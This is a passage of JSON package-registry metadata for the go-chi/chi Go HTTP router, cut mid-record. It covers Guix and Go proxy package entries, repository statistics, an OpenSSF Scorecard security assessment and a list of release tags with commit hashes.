packages/github.com%2Fgo-chi%2FChi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":13963856,"name":"go-github-com-go-chi-chi-v5","ecosystem":"guix","description":"Composable router for HTTP services written in Go","homepage":"https://github.com/go-chi/chi","licenses":"expat","normalized_licenses":["Other"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-03-02T22:59:16.377Z","latest_release_published_at":"2026-03-02T22:59:16.377Z","latest_release_number":"5.2.1","last_synced_at":"2026-04-07T02:00:23.107Z","created_at":"2026-03-02T22:59:16.192Z","updated_at":"2026-08-08T10:51:35.104Z","registry_url":"https://packages.guix.gnu.org/packages/go-github-com-go-chi-chi-v5/5.2.1/","install_command":"guix install go-github-com-go-chi-chi-v5","documentation_url":"https://git.savannah.gnu.org/cgit/guix.git/tree/gnu/packages/golang-web.scm#n5449","metadata":{"location":"gnu/packages/golang-web.scm:5449","variable_name":"go-github-com-go-chi-chi-v5"},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v